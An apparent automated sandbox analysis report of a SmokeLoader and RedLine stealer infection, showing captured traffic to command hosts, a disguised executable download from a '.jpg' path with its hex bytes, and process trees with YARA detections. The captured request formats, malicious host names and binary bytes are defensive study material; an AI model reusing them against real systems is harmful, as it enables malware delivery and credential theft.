                                                                                                                                                                    2024-02-08 18:08:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.349725104.21.83.2204437620C:\Users\user\AppData\Local\Temp\6056.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-02-08 18:08:54 UTC358OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Cookie: __cf_mw_byp=6TyRNe1BOo50RLLFMbbqPN0iTTmR4ztxhzUwzKhRpxA-1707415734-0-/api
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 61
                                                                                                                                                                    Host: liabilityarrangemenyit.shop
                                                                                                                                                                    2024-02-08 18:08:54 UTC61OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
                                                                                                                                                                    2024-02-08 18:08:55 UTC810INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=go7uojatp47up1gpdc7ur81lmc; expires=Mon, 03-Jun-2024 11:55:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8ISG9yBTLW1UGVc1ercSTrBKInWPXrAjI9546Qo7bdpk8XC7xu8UzjbEmvgHK8NUx3tdG2JnZ5WDxxrHolcwXBieyCibg4r5ro7fzPqqU56%2FZIIyttWSYPstCBPzz3rfbp4lGVGtsg8fcYHfgjE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8525d2186d95b123-ATL
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-02-08 18:08:55 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                    2024-02-08 18:08:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.349754103.20.213.70443640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-02-08 18:09:35 UTC164OUTGET /photo/1.jpg HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: mmtplonline.com
                                                                                                                                                                    2024-02-08 18:09:36 UTC251INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:36 GMT
                                                                                                                                                                    Server: Apache
                                                                                                                                                                    Last-Modified: Mon, 29 Jan 2024 05:24:04 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 678912
                                                                                                                                                                    Cache-Control: max-age=290304000, public
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                    2024-02-08 18:09:36 UTC7941INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f c0 0d 27 0b a1 63 74 0b a1 63 74 0b a1 63 74 64 d7 fd 74 12 a1 63 74 64 d7 c9 74 7a a1 63 74 64 d7 c8 74 2f a1 63 74 02 d9 f0 74 0e a1 63 74 0b a1 62 74 6d a1 63 74 64 d7 cc 74 0a a1 63 74 64 d7 f9 74 0a a1 63 74 64 d7 fe 74 0a a1 63 74 52 69 63 68 0b a1 63 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0a a2 65 63 00 00 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O'ctctctdtctdtzctdt/cttctbtmctdtctdtctdtctRichctPELec
                                                                                                                                                                    2024-02-08 18:09:36 UTC8000INData Raw: 79 08 6a 1b e8 22 24 00 00 59 ff 15 9c 60 48 00 a3 68 33 49 00 e8 02 2b 00 00 a3 18 d2 48 00 e8 4a 2a 00 00 85 c0 79 08 6a 08 e8 fc 23 00 00 59 e8 f8 27 00 00 85 c0 79 08 6a 09 e8 eb 23 00 00 59 6a 01 e8 c2 21 00 00 59 3b c6 74 07 50 e8 d8 23 00 00 59 e8 8e 27 00 00 f6 45 c4 01 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 36 96 07 00 89 45 e0 39 75 e4 75 06 50 e8 5e 23 00 00 e8 85 23 00 00 eb 2e 8b 45 ec 8b 08 8b 09 89 4d dc 50 51 e8 e2 25 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 44 23 00 00 e8 64 23 00 00 c7 45 fc fe ff ff ff 8b 45 e0 e8 59 17 00 00 c3 e8 ee 32 00 00 e9 89 fe ff ff 8b ff 55 8b ec 83 ec 20 8b 45 08 56 57 6a 08 59 be a0 62 48 00 8d 7d e0 f3 a5 89 45 f8 8b 45 0c 5f 89 45 fc 5e 85 c0 74 0c f6 00 08 74
                                                                                                                                                                    Data Ascii: yj"$Y`Hh3I+HJ*yj#Y'yj#Yj!Y;tP#Y'EtMjYQPVh@6E9uuP^##.EMPQ%YYeEE}uPD#d#EEY2U EVWjYbH}EE_E^tt
                                                                                                                                                                    2024-02-08 18:09:36 UTC8000INData Raw: 3b c3 72 3e 50 ff 75 fc e8 dd 15 00 00 59 59 85 c0 74 2f c1 ff 02 50 8d 34 b8 ff 15 d4 60 48 00 a3 48 23 49 00 ff 75 08 8b 3d d4 60 48 00 ff d7 89 06 83 c6 04 56 ff d7 a3 44 23 49 00 8b 45 08 eb 02 33 c0 5f 5e 5b c9 c3 8b ff 56 6a 04 6a 20 e8 49 15 00 00 59 59 8b f0 56 ff 15 d4 60 48 00 a3 48 23 49 00 a3 44 23 49 00 85 f6 75 05 6a 18 58 5e c3 83 26 00 33 c0 5e c3 6a 0c 68 58 9a 48 00 e8 15 f8 ff ff e8 59 01 00 00 83 65 fc 00 ff 75 08 e8 fc fe ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 31 f8 ff ff c3 e8 38 01 00 00 c3 8b ff 55 8b ec ff 75 08 e8 b7 ff ff ff f7 d8 1b c0 f7 d8 59 48 5d c3 8b ff 55 8b ec 8b 45 08 a3 5c d5 48 00 5d c3 8b ff 55 8b ec 56 6a 04 e8 b5 19 00 00 59 ff 35 5c d5 48 00 ff 15 d0 60 48 00 ff 75 08 8b f0 ff 15 d4 60
                                                                                                                                                                    Data Ascii: ;r>PuYYt/P4`HH#Iu=`HVD#IE3_^[Vjj IYYV`HH#ID#IujX^&3^jhXHYeuYEEE18UuYH]UE\H]UVjY5\H`Hu`
                                                                                                                                                                    2024-02-08 18:09:36 UTC8000INData Raw: 55 e8 0f 86 fc 00 00 00 80 7d ee 00 0f 84 d3 00 00 00 8d 75 ef 8a 0e 84 c9 0f 84 c6 00 00 00 0f b6 46 ff 0f b6 c9 e9 a9 00 00 00 68 01 01 00 00 8d 43 1c 56 50 e8 e1 0b 00 00 8b 4d e4 83 c4 0c 6b c9 30 89 75 e0 8d b1 08 bb 48 00 89 75 e4 eb 2b 8a 46 01 84 c0 74 29 0f b6 3e 0f b6 c0 eb 12 8b 45 e0 8a 80 f4 ba 48 00 08 44 3b 1d 0f b6 46 01 47 3b f8 76 ea 8b 7d 08 83 c6 02 80 3e 00 75 d0 8b 75 e4 ff 45 e0 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 69 fb ff ff 6a 06 89 43 0c 8d 43 10 8d 89 fc ba 48 00 5a 66 8b 31 66 89 30 83 c1 02 83 c0 02 4a 75 f1 8b f3 e8 d7 fb ff ff e9 b4 fe ff ff 80 4c 03 1d 04 40 3b c1 76 f6 83 c6 02 80 7e ff 00 0f 85 30 ff ff ff 8d 43 1e b9 fe 00 00 00 80 08 08 40 49 75 f9 8b 43 04 e8 11 fb ff ff 89 43 0c
                                                                                                                                                                    Data Ascii: U}uFhCVPMk0uHu+Ft)>EHD;FG;v}>uuE}ur{CijCCHZf1f0JuL@;v~0C@IuCC
                                                                                                                                                                    2024-02-08 18:09:37 UTC8000INData Raw: d7 ec ff ff 83 c4 0c 89 bd a0 f7 ff ff eb 11 83 a5 a0 f7 ff ff 00 33 c9 39 bd a0 f7 ff ff 75 5d 6a 0a 8d 85 64 f7 ff ff 50 56 e8 8e a5 00 00 8b 8d 64 f7 ff ff 83 c4 0c 48 83 bd 9c f7 ff ff 00 8d 51 01 89 85 80 f7 ff ff 89 95 7c f7 ff ff 75 28 85 c0 0f 88 f5 07 00 00 80 39 24 0f 85 ec 07 00 00 83 f8 64 0f 8d e3 07 00 00 3b 85 6c f7 ff ff 7e 06 89 85 6c f7 ff ff 33 c9 8b f2 8b 95 80 f7 ff ff 8b 85 60 f7 ff ff ff 24 85 75 99 40 00 83 f8 08 0f 84 b5 07 00 00 83 f8 07 0f 87 42 0f 00 00 eb d9 39 8d 9c f7 ff ff 75 0c 39 bd a0 f7 ff ff 0f 84 2c 0f 00 00 39 bd 9c f7 ff ff 0f 85 01 03 00 00 83 bd a0 f7 ff ff ff 0f 85 f4 02 00 00 e9 0e 0f 00 00 83 8d a8 f7 ff ff ff 89 8d 40 f7 ff ff 89 8d 44 f7 ff ff 89 8d 70 f7 ff ff 89 8d 68 f7 ff ff 89 8d b0 f7 ff ff 89 8d 5c f7
                                                                                                                                                                    Data Ascii: 39u]jdPVdHQ|u(9$d;l~l3`$u@B9u9,9@Dph\
                                                                                                                                                                    2024-02-08 18:09:37 UTC8000INData Raw: 66 04 00 83 66 08 00 5f 8b c6 5e 5d c2 08 00 8b 41 08 c3 8b 41 08 85 c0 74 08 8b 49 04 8a 44 01 ff c3 32 c0 c3 8b ff 55 8b ec ff 71 08 ff 71 04 ff 75 0c ff 75 08 e8 ea fc ff ff 83 c4 10 5d c2 08 00 8b ff 55 8b ec 83 79 04 01 75 17 6a 04 68 64 79 48 00 ff 75 0c ff 75 08 e8 c6 fc ff ff 83 c4 10 eb 03 8b 45 08 5d c2 08 00 8b ff 55 8b ec a1 74 df 48 00 80 38 40 ff 75 0c 75 10 8b 4d 08 ff 05 74 df 48 00 e8 d1 fc ff ff eb 0a ff 75 08 e8 1f 49 00 00 59 59 8b 45 08 5d c3 8b ff 55 8b ec ff 75 08 e8 f2 fb ff ff 8b 45 08 59 5d c3 8b ff 55 8b ec 56 8b f1 80 7e 04 01 7f 2d 83 3e 00 8b 45 08 74 1f 83 f8 02 74 1a 83 f8 03 74 15 85 c0 74 17 50 e8 eb f9 ff ff 59 50 8b ce e8 71 fd ff ff eb 06 50 e8 fe fd ff ff 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 8b f1 33 db 39 1e 74
                                                                                                                                                                    Data Ascii: ff_^]AAtID2Uqquu]UyujhdyHuuE]UtH8@uuMtHuIYYE]UuEY]UV~->EttttPYPqP^]USV39t
                                                                                                                                                                    2024-02-08 18:09:37 UTC8000INData Raw: ff 50 8d 45 ec 6a 01 50 e8 9f f9 ff ff eb 0d 6a 01 8d 45 ec 6a 01 50 e8 bd 00 00 00 8b 08 8b 40 04 83 c4 0c 89 45 f8 89 4d f4 85 c9 75 07 c6 05 8c df 48 00 01 80 7d ff 00 75 66 8d 45 e4 50 e8 59 f7 ff ff 59 50 8d 45 ec 50 6a 3c 8d 4d dc e8 b3 e4 ff ff 8b c8 e8 21 e6 ff ff 8d 45 ec 50 8d 4d f4 e8 f6 e3 ff ff 8b 4d f4 85 c9 74 13 8b 01 ff 50 04 3c 3e 75 0a 6a 20 8d 4d f4 e8 43 e6 ff ff 6a 3e 8d 4d f4 e8 39 e6 ff ff 80 7d 0c 00 74 10 a1 74 df 48 00 80 38 00 74 06 ff 05 74 df 48 00 8b 45 08 8b 4d f4 89 3d 6c df 48 00 5f 89 35 68 df 48 00 89 08 8b 4d f8 5e 89 1d 70 df 48 00 89 48 04 5b c9 c3 8b 45 08 81 60 04 ff 00 ff ff 83 20 00 c6 40 04 02 c9 c3 8b ff 55 8b ec 83 ec 38 a1 4c b1 48 00 33 c5 89 45 fc 53 8b 1d 74 df 48 00 8a 0b 0f be c1 56 8b 75 08 83 e8 30 89
                                                                                                                                                                    Data Ascii: PEjPjEjP@EMuH}ufEPYYPEPj<M!EPMMtP<>uj MCj>M9}ttH8ttHEM=lH_5hHM^pHH[E` @U8LH3EStHVu0
                                                                                                                                                                    2024-02-08 18:09:37 UTC8000INData Raw: 00 d1 e8 f7 d0 a8 01 8b c3 74 37 83 e0 0c 3c 0c 75 4a 83 7d 18 00 0f 85 0b ff ff ff 8d 45 f4 50 8d 45 ac 50 8d 45 b4 50 e8 d0 e5 ff ff 59 8b c8 e8 07 c7 ff ff 8b 08 8b 40 04 89 4d f4 89 45 f8 eb 1a 83 e0 0c 3c 0c 75 13 8d 45 ac 50 e8 ab e5 ff ff 59 50 8d 4d f4 e8 ba ba ff ff f6 c3 02 74 28 8d 45 f4 50 8d 45 c4 50 68 f4 7b 48 00 8d 4d ac e8 7e c2 ff ff 8b c8 e8 bf c6 ff ff 8b 45 c4 89 45 f4 8b 45 c8 89 45 f8 f6 c3 01 74 28 8d 45 f4 50 8d 45 c4 50 68 ec 7b 48 00 8d 4d ac e8 51 c2 ff ff 8b c8 e8 92 c6 ff ff 8b 45 c4 89 45 f4 8b 45 c8 89 45 f8 33 d2 bb 00 01 00 00 39 55 18 0f 85 90 00 00 00 8b 75 0c 39 16 74 60 8b 4e 04 85 cb 75 42 8b 45 14 39 10 74 3b 50 8d 45 c4 50 6a 20 8d 4d ac e8 dd c4 ff ff 8b c8 e8 4b c6 ff ff 8b 45 c4 89 45 d4 8b 45 c8 6a 20 8d 4d d4
                                                                                                                                                                    Data Ascii: t7<uJ}EPEPEPY@ME<uEPYPMt(EPEPh{HM~EEEEt(EPEPh{HMQEEEE39Uu9t`NuBE9t;PEPj MKEEEj M
                                                                                                                                                                    2024-02-08 18:09:37 UTC8000INData Raw: 85 1c e5 ff ff 8b 06 03 c7 83 78 38 00 74 15 8a 50 34 88 55 f4 88 4d f5 83 60 38 00 6a 02 8d 45 f4 50 eb 4b 0f be c1 50 e8 af 6d ff ff 59 85 c0 74 3a 8b 8d 34 e5 ff ff 2b cb 03 4d 10 33 c0 40 3b c8 0f 86 a5 01 00 00 6a 02 8d 85 44 e5 ff ff 53 50 e8 15 2f 00 00 83 c4 0c 83 f8 ff 0f 84 92 04 00 00 43 ff 85 40 e5 ff ff eb 1b 6a 01 53 8d 85 44 e5 ff ff 50 e8 f1 2e 00 00 83 c4 0c 83 f8 ff 0f 84 6e 04 00 00 33 c0 50 50 6a 05 8d 4d f4 51 6a 01 8d 8d 44 e5 ff ff 51 50 ff b5 20 e5 ff ff 43 ff 85 40 e5 ff ff ff 15 48 61 48 00 8b f0 85 f6 0f 84 3d 04 00 00 6a 00 8d 85 2c e5 ff ff 50 56 8d 45 f4 50 8b 85 24 e5 ff ff 8b 00 ff 34 07 ff 15 28 60 48 00 85 c0 0f 84 0a 04 00 00 8b 85 40 e5 ff ff 8b 8d 30 e5 ff ff 03 c1 89 85 38 e5 ff ff 39 b5 2c e5 ff ff 0f 8c f6 03 00 00
                                                                                                                                                                    Data Ascii: x8tP4UM`8jEPKPmYt:4+M3@;jDSP/C@jSDP.n3PPjMQjDQP C@HaH=j,PVEP$4(`H@089,
                                                                                                                                                                    2024-02-08 18:09:37 UTC8000INData Raw: ff ff c7 00 09 00 00 00 e8 7b 0b ff ff 83 20 00 89 5d dc 89 5d e0 c7 45 fc fe ff ff ff e8 0c 00 00 00 8b 45 dc 8b 55 e0 e8 f3 1d ff ff c3 ff 75 08 e8 4f 12 00 00 59 c3 8b ff 55 8b ec ff 05 44 d5 48 00 68 00 10 00 00 e8 4c 3a ff ff 59 8b 4d 08 89 41 08 85 c0 74 0d 83 49 0c 08 c7 41 18 00 10 00 00 eb 11 83 49 0c 04 8d 41 14 89 41 08 c7 41 18 02 00 00 00 8b 41 08 83 61 04 00 89 01 5d c3 6a 02 e8 a3 29 ff ff 59 c3 8b ff 55 8b ec 83 ec 4c a1 4c b1 48 00 33 c5 89 45 fc 53 33 db 56 8b 75 08 57 89 5d d4 89 5d e4 89 5d e0 89 5d d8 89 5d dc 89 75 b4 89 5d b8 39 5e 14 0f 84 19 03 00 00 8d 46 04 39 18 75 20 50 0f b7 46 30 68 04 10 00 00 50 8d 45 b4 53 50 e8 d8 d3 ff ff 83 c4 14 85 c0 0f 85 ca 02 00 00 6a 04 e8 a9 39 ff ff 6a 02 bf 80 01 00 00 57 89 45 d4 e8 de 39 ff
                                                                                                                                                                    Data Ascii: { ]]EEUuOYUDHhL:YMAtIAIAAAAa]j)YULLH3ES3VuW]]]]]u]9^F9u PF0hPESPj9jWE9


                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:19:08:15
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\IIBXMzS0zN.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\IIBXMzS0zN.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:249'344 bytes
                                                                                                                                                                    MD5 hash:F35C060B3AC3B38CFF5FC9131E794F93
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1433007725.000000000054F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1432875681.0000000000511000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1432875681.0000000000511000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1432458684.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:19:08:20
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                    Imagebase:0x7ff7721e0000
                                                                                                                                                                    File size:5'311'304 bytes
                                                                                                                                                                    MD5 hash:574AF6D80FE7CC6422A8592DE7A39F78
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:19:08:39
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\egiibgt
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\egiibgt
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:249'344 bytes
                                                                                                                                                                    MD5 hash:F35C060B3AC3B38CFF5FC9131E794F93
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1658865401.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1658865401.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.1658547253.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1659020384.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1659020384.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1659298227.00000000007AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 82%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:19:08:43
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'998'848 bytes
                                                                                                                                                                    MD5 hash:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.1644186727.0000000002625000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 88%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:19:08:43
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'998'848 bytes
                                                                                                                                                                    MD5 hash:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:19:08:44
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\6056.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\6056.exe
                                                                                                                                                                    Imagebase:0x7c0000
                                                                                                                                                                    File size:3'454'976 bytes
                                                                                                                                                                    MD5 hash:50F2E865696BEEB3C20E1F05DC72D03C
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 54%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:19:08:45
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\6374.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\6374.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:431'104 bytes
                                                                                                                                                                    MD5 hash:1996A23C7C764A77CCACF5808FEC23B0
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 91%, ReversingLabs
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:19:08:46
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:regsvr32 /s C:\Users\user\AppData\Local\Temp\6653.dll
                                                                                                                                                                    Imagebase:0x7ff6cc3c0000
                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:19:08:46
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline: /s C:\Users\user\AppData\Local\Temp\6653.dll
                                                                                                                                                                    Imagebase:0xe40000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:16
                                                                                                                                                                    Start time:19:08:51
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\78A4.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\78A4.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:8'336'105 bytes
                                                                                                                                                                    MD5 hash:7176404D8394DECDC9399BB62C01A2FF
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
